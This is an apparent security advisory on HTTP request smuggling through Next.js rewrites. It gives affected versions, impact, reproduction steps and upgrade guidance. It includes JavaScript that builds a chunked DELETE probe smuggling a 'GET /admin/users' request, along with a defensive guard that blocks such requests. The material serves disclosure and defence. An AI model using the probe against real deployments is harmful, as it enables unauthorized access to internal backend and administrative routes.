Next.js HTTP Request Smuggling Vulnerability in Rewrites

Vulnerability

An HTTP request smuggling vulnerability has been identified in Next.js versions from 9.5.0 prior to 15.5.13, and in 16.x releases prior to 16.1.7. When a Next.js rewrite proxies traffic to an external backend, a crafted DELETE or OPTIONS request carrying a Transfer-Encoding: chunked header can cause the proxy and the backend to disagree on where that request ends. An attacker can use this boundary disagreement to smuggle a second request to backend routes the rewrite was never meant to reach, such as internal or admin endpoints, bypassing the assumption that only the configured rewrite destination is exposed. The issue does not affect applications hosted on providers that handle rewrites at the CDN level, like Vercel, because Next.js itself is not the proxying hop there.

Impact

Exploitation of this vulnerability could lead to unauthorized access to backend routes that are not intended to be exposed, allowing attackers to bypass normal rewrite path assumptions and potentially access sensitive internal or administrative endpoints.

Reproduction

The vulnerability can be reproduced against a self-hosted Next.js application in an affected version whose next.config.js rewrite proxies a route to an external backend. Sending a DELETE or OPTIONS request with a Transfer-Encoding: chunked header through that rewritten route produces the request boundary disagreement between the proxy and the backend; the bytes the two hops disagree about are what the backend can read as a second, smuggled request.
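The following is an added example and is not code from Next.js or from this advisory. It builds the kind of request the reproduction step describes (a DELETE with Transfer-Encoding: chunked aimed at a rewritten route) as raw bytes and shows the two readings of the same stream that a boundary disagreement produces: a hop that honours the chunked framing sees one DELETE whose body is the attacker's text, while a hop that treats the DELETE as bodiless is left with exactly that text to parse as the next request. The advisory does not say which hop drops the framing, so the second reading is an illustrative model; the host, paths and the probe target are constructed for the example, and nothing here is sent over the network.

```javascript
'use strict';

const CRLF = '\r\n';

// Frame an ASCII payload as HTTP/1.1 chunked transfer coding: one or more
// "<hex size>\r\n<bytes>\r\n" chunks followed by the zero-length last chunk.
function encodeChunked(payload, chunkSize = 32) {
  let out = '';
  for (let i = 0; i < payload.length; i += chunkSize) {
    const piece = payload.slice(i, i + chunkSize);
    out += piece.length.toString(16) + CRLF + piece + CRLF;
  }
  return out + '0' + CRLF + CRLF;
}

// Strict decoder: hexadecimal size line (chunk extensions after ';' are
// ignored, whitespace is not tolerated), exact byte count, CRLF terminator,
// empty trailer section. Returns the body and how many bytes were consumed
// so a caller can tell whether anything is left on the stream.
function decodeChunked(framed) {
  let pos = 0;
  let body = '';
  for (;;) {
    const eol = framed.indexOf(CRLF, pos);
    if (eol < 0) throw new Error('missing chunk-size line');
    const sizeText = framed.slice(pos, eol).split(';')[0];
    if (!/^[0-9a-fA-F]+$/.test(sizeText)) {
      throw new Error(`bad chunk size: ${JSON.stringify(sizeText)}`);
    }
    const size = parseInt(sizeText, 16);
    pos = eol + 2;
    if (size === 0) {
      if (framed.slice(pos, pos + 2) !== CRLF) throw new Error('trailers not supported');
      return { body, consumed: pos + 2 };
    }
    if (framed.length < pos + size + 2) throw new Error('truncated chunk');
    body += framed.slice(pos, pos + size);
    pos += size;
    if (framed.slice(pos, pos + 2) !== CRLF) throw new Error('chunk not CRLF-terminated');
    pos += 2;
  }
}

// Raw request for a hypothetical rewrite such as
//   { source: '/api/backend/:path*', destination: 'https://backend.example/:path*' }.
// `smuggledText` is whatever the attacker wants the backend to read next.
function buildProbe({ host, rewrittenPath, smuggledText }) {
  const head = [
    `DELETE ${rewrittenPath} HTTP/1.1`,
    `Host: ${host}`,
    'Transfer-Encoding: chunked',
    'Connection: keep-alive',
    '',
    '',
  ].join(CRLF);
  return head + encodeChunked(smuggledText);
}

// The two readings of one byte stream. `honoursChunked` is what a parser
// that applies Transfer-Encoding sees; `bodyDropped` models a hop that
// forwards the DELETE without its body, leaving the de-chunked bytes to be
// read as the start of a second request (illustrative, see lead-in).
function interpretations(raw) {
  const headerEnd = raw.indexOf(CRLF + CRLF);
  if (headerEnd < 0) throw new Error('no end of headers');
  const requestLine = raw.slice(0, headerEnd).split(CRLF)[0];
  const { body, consumed } = decodeChunked(raw.slice(headerEnd + 4));
  return {
    honoursChunked: { requests: [requestLine], body, leftover: raw.length - (headerEnd + 4 + consumed) },
    bodyDropped: { requests: [requestLine, body.split(CRLF)[0]] },
  };
}

// Constructed sample: the smuggled text is itself a request line for an
// admin path that the rewrite was not supposed to expose.
const SAMPLE = buildProbe({
  host: 'app.example',
  rewrittenPath: '/api/backend/items/7',
  smuggledText: 'GET /admin/users HTTP/1.1' + CRLF + 'Host: backend.example' + CRLF + CRLF,
});
```

Running `interpretations(SAMPLE)` shows the disagreement directly: the chunk-honouring reading yields a single DELETE with nothing left over, the body-dropping reading yields a DELETE followed by `GET /admin/users HTTP/1.1`. Whether a real backend accepts that second line as a new request depends on its parser and on how the proxy re-frames the forwarded body, which this advisory does not specify.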

Remediation

Upgrade to Next.js 15.5.13 (for the 15.x line) or 16.1.7 (for the 16.x line), where this vulnerability has been patched. If an immediate upgrade is not possible, block chunked DELETE and OPTIONS requests on rewritten routes at the edge or at a proxy in front of Next.js, and enforce authentication and authorization on the backend routes themselves so that a smuggled request cannot reach an internal or administrative endpoint unauthenticated.
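The following is an added example and is not code from Next.js or from this advisory. It implements the interim mitigation as a guard that rejects DELETE and OPTIONS requests carrying a Transfer-Encoding header before they reach a rewritten route. It rejects on the presence of the header rather than on the exact value "chunked", which closes the usual value-obfuscation bypasses (for example "gzip, chunked" or stray whitespace); that choice is the example's own, not something the advisory prescribes. The rewrite prefixes are hypothetical and stand in for the `source` patterns of the application's next.config.js rewrites.

```javascript
'use strict';

const RISKY_METHODS = new Set(['DELETE', 'OPTIONS']);

// Hypothetical rewrite sources that proxy to an external backend.
const REWRITTEN_PREFIXES = ['/api/backend/', '/legacy/'];

// Split a Transfer-Encoding header into lower-cased tokens. Node's
// IncomingMessage lower-cases header names and joins repeated
// Transfer-Encoding headers with ', '; other stacks may hand us an array.
function transferEncodingTokens(headers) {
  const raw = headers['transfer-encoding'];
  if (raw == null) return [];
  const joined = Array.isArray(raw) ? raw.join(',') : String(raw);
  return joined.split(',').map((t) => t.trim().toLowerCase()).filter(Boolean);
}

function isRewrittenPath(pathname, prefixes = REWRITTEN_PREFIXES) {
  return prefixes.some((p) => pathname === p.replace(/\/$/, '') || pathname.startsWith(p));
}

// Returns null to allow the request, or { status, reason } to reject it.
function evaluateRequest({ method, url, headers }, prefixes = REWRITTEN_PREFIXES) {
  const pathname = url.split('?')[0];
  if (!isRewrittenPath(pathname, prefixes)) return null;
  if (!RISKY_METHODS.has(String(method).toUpperCase())) return null;
  const tokens = transferEncodingTokens(headers);
  if (tokens.length === 0) return null;
  return {
    status: 400,
    reason: `${method.toUpperCase()} with Transfer-Encoding (${tokens.join(',')}) is not accepted on ${pathname}`,
  };
}

// Connect/Express-style handler usable in a Node reverse proxy placed in
// front of Next.js; `req` is an http.IncomingMessage or anything with the
// same method/url/headers shape.
function smugglingGuard(req, res, next) {
  const verdict = evaluateRequest({ method: req.method, url: req.url, headers: req.headers });
  if (verdict) {
    res.statusCode = verdict.status;
    // Do not keep a connection alive once its framing is in doubt.
    res.setHeader('Connection', 'close');
    res.end(verdict.reason);
    return;
  }
  next();
}
```

The same decision logic can be expressed in a Next.js middleware matcher or in the edge proxy's own rule language; the important properties are that it runs before the rewrite is applied, that it matches on method and header presence rather than on a single header value, and that it closes the connection after rejecting, so no bytes that were meant for a smuggled request are left for the next parser.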

Added: Mar 18, 2026, 1:20 AM
Updated: Mar 18, 2026, 1:20 AM

Vulnerability Rating

Custom Algorithm

spread          5.2
impact          0.6
exploitability  6.8
remediation     7.9
relevance       4.5
threat          4.8
urgency         2.9
incentive       0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.